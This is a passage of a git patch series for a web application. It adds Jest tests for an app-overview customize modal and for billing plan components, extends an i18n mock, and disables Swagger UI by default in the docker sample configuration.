async () => { + // Arrange + const onClose = jest.fn() + const props = { ...defaultProps, onClose } + + // Act + render() + + // Wait for modal to be fully rendered + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + + // Find the close button by navigating from the heading to the close icon + // The close icon is an SVG inside a sibling div of the title + const heading = screen.getByRole('heading', { name: /customize\.title/i }) + const closeIcon = heading.parentElement!.querySelector('svg') + + // Assert - closeIcon must exist for the test to be valid + expect(closeIcon).toBeInTheDocument() + fireEvent.click(closeIcon!) + expect(onClose).toHaveBeenCalledTimes(1) + }) + }) + + // Edge cases tests - verify component handles boundary conditions + describe('Edge Cases', () => { + it('should handle empty appId', async () => { + // Arrange + const props = { ...defaultProps, appId: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'') + }) + }) + + it('should handle empty api_base_url', async () => { + // Arrange + const props = { ...defaultProps, api_base_url: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'') + }) + }) + + it('should handle special characters in appId', async () => { + // Arrange + const specialAppId = 'app-id-with-special-chars_123' + const props = { ...defaultProps, appId: specialAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`) + }) + }) + + it('should handle URL with special characters in api_base_url', async () => { + // Arrange + const specialApiUrl = 'https://api.example.com:8080/v1' + const props = { ...defaultProps, api_base_url: specialApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`) + }) + }) + }) + + // StepNum component tests - verify step number styling + describe('StepNum component', () => { + it('should render step numbers with correct styling class', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - The StepNum component is the direct container of the text + await waitFor(() => { + const stepNumber1 = screen.getByText('1') + expect(stepNumber1).toHaveClass('rounded-2xl') + }) + }) + }) + + // GithubIcon component tests - verify GitHub icon renders correctly + describe('GithubIcon component', () => { + it('should render GitHub icon SVG within GitHub link button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Find GitHub link and verify it contains an SVG icon with expected class + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + const githubIcon = githubLink.querySelector('svg') + expect(githubIcon).toBeInTheDocument() + expect(githubIcon).toHaveClass('text-text-secondary') + }) + }) + }) +}) diff --git a/web/app/components/app/overview/customize/index.tsx b/web/app/components/app/overview/customize/index.tsx index e440a8cf26..698bc98efd 100644 --- a/web/app/components/app/overview/customize/index.tsx +++ b/web/app/components/app/overview/customize/index.tsx @@ -12,7 +12,6 @@ import Tag from '@/app/components/base/tag' type IShareLinkProps = { isShow: boolean onClose: () => void - linkUrl: string api_base_url: string appId: string mode: AppModeEnum From e5cf0d0bf619abb1afcbada0f89e67674799e229 Mon Sep 17 00:00:00 2001 From: -LAN- Date: Tue, 16 Dec 2025 15:01:51 +0800 Subject: [PATCH 25/27] chore: Disable Swagger UI by default in docker samples (#29723) --- docker/.env.example | 2 +- docker/docker-compose.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/docker/.env.example b/docker/.env.example index 8be75420b1..feca68fa02 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -1421,7 +1421,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -SWAGGER_UI_ENABLED=true +SWAGGER_UI_ENABLED=false SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index cc17b2853a..1e50792b6d 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -631,7 +631,7 @@ x-shared-env: &shared-api-worker-env QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200} QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-} QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30} - SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true} + SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false} SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html} DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true} DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0} From 47cd94ec3e68c4c3b7e8adab2d179096e9b066ff Mon Sep 17 00:00:00 2001 From: Joel Date: Tue, 16 Dec 2025 15:06:53 +0800 Subject: [PATCH 26/27] chore: tests for billings (#29720) --- web/__mocks__/react-i18next.ts | 8 +- .../plans/cloud-plan-item/button.spec.tsx | 50 +++++ .../plans/cloud-plan-item/index.spec.tsx | 188 ++++++++++++++++++ .../plans/cloud-plan-item/list/index.spec.tsx | 30 +++ .../billing/pricing/plans/index.spec.tsx | 87 ++++++++ .../self-hosted-plan-item/button.spec.tsx | 61 ++++++ .../self-hosted-plan-item/index.spec.tsx | 143 +++++++++++++ .../self-hosted-plan-item/list/index.spec.tsx | 25 +++ .../self-hosted-plan-item/list/item.spec.tsx | 12 ++ 9 files changed, 603 insertions(+), 1 deletion(-) create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/button.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/list/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/self-hosted-plan-item/button.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/self-hosted-plan-item/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/self-hosted-plan-item/list/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/self-hosted-plan-item/list/item.spec.tsx diff --git a/web/__mocks__/react-i18next.ts b/web/__mocks__/react-i18next.ts index b0d22e0cc0..1e3f58927e 100644 --- a/web/__mocks__/react-i18next.ts +++ b/web/__mocks__/react-i18next.ts @@ -19,7 +19,13 @@ */ export const useTranslation = () => ({ - t: (key: string) => key, + t: (key: string, options?: Record) => { + if (options?.returnObjects) + return [`${key}-feature-1`, `${key}-feature-2`] + if (options) + return `${key}:${JSON.stringify(options)}` + return key + }, i18n: { language: 'en', changeLanguage: jest.fn(), diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/button.spec.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/button.spec.tsx new file mode 100644 index 0000000000..0c50c80c87 --- /dev/null +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/button.spec.tsx @@ -0,0 +1,50 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import Button from './button' +import { Plan } from '../../../type' + +describe('CloudPlanButton', () => { + describe('Disabled state', () => { + test('should disable button and hide arrow when plan is not available', () => { + const handleGetPayUrl = jest.fn() + // Arrange + render( +